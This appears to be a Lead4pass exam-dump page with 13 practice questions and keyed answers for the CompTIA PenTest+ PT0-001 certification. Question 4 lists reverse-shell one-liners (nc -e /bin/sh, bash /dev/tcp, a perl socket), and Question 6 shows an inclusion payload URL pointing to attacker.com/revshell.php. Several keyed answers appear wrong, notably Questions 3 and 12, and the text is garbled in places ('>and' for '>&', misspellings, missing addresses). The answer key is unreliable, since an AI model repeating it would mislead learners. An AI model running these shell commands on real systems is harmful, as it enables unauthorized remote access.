Useful Latest Lead4pass IT Exam Dumps Questions And Answers Update

Latest Microsoft, Cisco, CompTIA And Other Lead4pass Exam Dumps Training Materials And Study Guides Update Free Try

Tag Archive : pt0-001 pdf

CompTIA PT0-001 exam exercise questions,PT0-001 dumps easy to prepare for passing exams

CompTIA PenTest+ PT0-001 Study Guide” Exam PT0-001. Here you can get the latest free CompTIA PT0-001 exam exercise questions and answers for free and easily improve your skills!

PT0-001 exam: The CompTIA PenTest+ certification verifies that successful candidates have the knowledge and skills required to plan and scope an assessment, understand legal and compliance requirements, perform vulnerability scanning and penetration testing, analyze data, and effectively report and communicate results. Follow the link to find more information about https://www.lead4pass.com/pt0-001.html exam.

Watch the CompTIA PT0-001 video tutorial online

Table of Contents:

Latest CompTIA PT0-001 pdf

[PDF] Free CompTIA PT0-001 pdf dumps download from Google Drive: https://drive.google.com/open?id=174AtllRzbI_c3ioXliaweHmevjoTd2oT

PenTest+ (Plus) Certification | CompTIA IT Certifications:https://www.comptia.org/certifications/pentest

About the exam

CompTIA PenTest+ assesses the most up-to-date penetration testing, and vulnerability assessment and management skills necessary to determine the resiliency of the network against attacks.
Successful candidates will have the intermediate skills required to customize assessment frameworks to effectively collaborate on and report findings. Candidates will also have the best practices to communicate recommended strategies to improve the overall state of IT security.

Free CompTIA PT0-001 Exam Practice Questions

QUESTION 1
A security consultant receives a document outlining the scope of an upcoming penetration test. This document contains
IP addresses and times that each can be scanned. Which of the following would contain this information?
A. Rules of engagement
B. Request for proposal
C. Master service agreement
D. Business impact analysis
Correct Answer: A

QUESTION 2
An attacker uses SET to make a copy of a company\\’s cloud-hosted web mail portal and sends an email m to obtain the
CEO s login credentials Which of the following types of attacks is this an example of?
A. Elicitation attack
B. Impersonation attack
C. Spear phishing attack
D. Drive-by download attack
Correct Answer: C

QUESTION 3
An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to
manage power generation and cooling. Which of the following is a consideration unique to such an environment that
must be made by the firm when preparing for the assessment?
A. Selection of the appropriate set of security testing tools
B. Current and load ratings of the ICS components
C. Potential operational and safety hazards
D. Electrical certification of hardware used in the test
Correct Answer: A

QUESTION 4
A penetration tester compromises a system that has unrestricted network over port 443 to any host. The penetration
tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the
penetration tester mostly like use?
A. perl -e ` use SOCKET\\’; $i=\\’; $p=\\’443;
B. ssh [email protected] -p 443
C. nc -e /bin/sh 443
D. bash -i >and /dev/tcp// 443 0>and1
Correct Answer: A
References: https://hackernoon.com/reverse-shell-cf154dfee6bd

QUESTION 5
A security consultant found a SCADA device in one of the VLANs in scope. Which of the following actions would BEST
create a potentially destructive outcome against device?
A. Launch an SNMP password brute force attack against the device.
B. Lunch a Nessus vulnerability scan against the device.
C. Launch a DNS cache poisoning attack against the device.
D. Launch an SMB exploit against the device.
Correct Answer: A

QUESTION 6
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Which of the following remediation steps should be taken to prevent this type of attack?
A. Implement a blacklist.
B. Block URL redirections.
C. Double URL encode the parameters.
D. Stop external calls from the application.
Correct Answer: B

QUESTION 7
A company requested a penetration tester review the security of an in-house-developed Android application. The
penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the
APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO)
A. Convert to JAR
B. Decompile
C. Cross-compile the application
D. Convert JAR files to DEX
E. Re-sign the APK
F. Attach to ADB
Correct Answer: BD

QUESTION 8
In which of the following components is an exploited vulnerability MOST likely to affect multiple running application
containers at once?
A. Common libraries
B. Configuration files
C. Sandbox escape
D. ASLR bypass
Correct Answer: A

QUESTION 9
Joe, a penetration tester, is asked to assess a company\\’s physical security by gaining access to its corporate office.
Joe ism looking for a method that will enable him to enter the building during business hours or when there are no
employee on-site. Which of the following would be MOST effective in accomplishing this?
A. Badge cloning
B. Lock picking
C. Tailgating
D. Piggybacking
Correct Answer: A
http://www.hackingarticles.in/netbios-and-smb-penetration-testing-on-windows/

QUESTION 10
A penetration tester has a full shell to a domain controller and wants to discover any user account that has not
authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?
A. dsrm -users “DN=compony.com; OU=hq CN=usera”
B. dsuser -name -account -limit 3
C. dsquery uaer -inactive 3
D. dsquery -o -rein -limit 21
Correct Answer: C

QUESTION 11
After several attempts, an attacker was able to gain unauthorized access through a biometric sensor using the
attacker\\’s actual fingerprint without exploitation. Which of the following is the MOST likely of what happened?
A. The biometric device is tuned more toward false positives
B. The biometric device is configured more toward true negatives
C. The biometric device is set to fail closed
D. The biometnc device duplicated a valid user\\’s fingerpnnt.
Correct Answer: A

QUESTION 12
During testing, a critical vulnerability is discovered on a client\\’s core server. Which of the following should be the NEXT
action?
A. Disable the network port of the affected service.
B. Complete all findings, and then submit them to the client.
C. Promptly alert the client with details of the finding.
D. Take the target offline so it cannot be exploited by an attacker.
Correct Answer: A

QUESTION 13
A penetration tester observes that several high numbered ports are listening on a public web server. However, the
system owner says the application only uses port 443. Which of the following would be BEST to recommend?
A. Transition the application to another port
B. Filter port 443 to specific IP addresses
C. Implement a web application firewall
D. Disable unneeded services.
Correct Answer: D

Related PT0-001 Popular Exam resources

title pdf youtube CompTIA lead4pass Lead4Pass Total Questions
CompTIA PenTest+ lead4pass PT0-001 dumps pdf lead4pass PT0-001 youtube PenTest+ (Plus) Certification | CompTIA IT Certifications https://www.lead4pass.com/pt0-001.html 145 Q&A

Get Lead4Pass Coupons(12% OFF)

lead4pass coupons

What are the advantages of Lead4pass?

Lead4pass employs the most authoritative exam specialists from Cisco, CompTIA, Microsoft, IBM, Oracle, etc.
We update exam data throughout the year. Highest pass rate! We have a large user base. We are an industry leader! Choose Lead4Pass to pass the exam with ease!

why lead4pass

Summarize:

It’s not easy to pass the CompTIA exam, but with accurate learning materials and proper practice, you can crack the exam with excellent results. Lead4pass provides you with the most relevant learning materials that you can use to help you prepare.